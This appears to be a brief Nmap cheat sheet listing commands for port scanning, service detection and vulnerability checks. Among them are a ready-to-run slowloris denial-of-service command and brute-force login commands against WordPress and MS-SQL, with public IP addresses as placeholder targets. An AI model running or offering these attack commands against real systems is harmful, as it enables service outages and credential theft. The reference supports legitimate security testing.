Use Nmap to Scan Ports (cheat sheet)

1.Basic scan

nmap 41.22.10.1

nmap yourdomain.com

2.Scan specific ports

nmap -p 1-65535 41.22.10.1

nmap -p 1,443 41.22.10.1

3.Scan multipul ips

nmap 1.1.1.1 1.1.1.2

nmap 1.1.1.1,2,3,4

(This will scan 1.1.1.1 1.1.1.2 1.1.1.3 1.1.1.4)

nmap 1.1.1.1-4

nmap 1.1.1.*

nmap 1.1.1.0/28

4.Scan popular ports

nmap --top-ports 20 1.1.1.1

(Scan 20 ports of 1.1.1.1)

5.Scan target from a file

nmap -iL list.txt

6.Scan an Service detection

nmap -A -T4 1.1.1.1

(-A is for service detection. -T4 speeds up this operation)

7.Detect Service/Daemon

nmap -sV 1.1.1.1

8.Scan using UDP/TCP

nmap -sT 1.1.1.1

(For TCP)

nmap -sU 1.1.1.1

(For UDP)

9.Vulnerability detection

nmap -Pn --script vuln 1.1.1.1

10.Launch DOS Attack

nmap 1.1.1.1 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true

11.Lauch brute force attacks

nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 1.1.1.1

(Wordpress brute force attack)

nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 1.1.1.1

(Ms-sql brute force attack)

12.Detect malware infections

nmap -sV --script=http-malware-host 1.1.1.1

nmap -p80 --script http-google-malware 1.1.1.1

(Google malware check)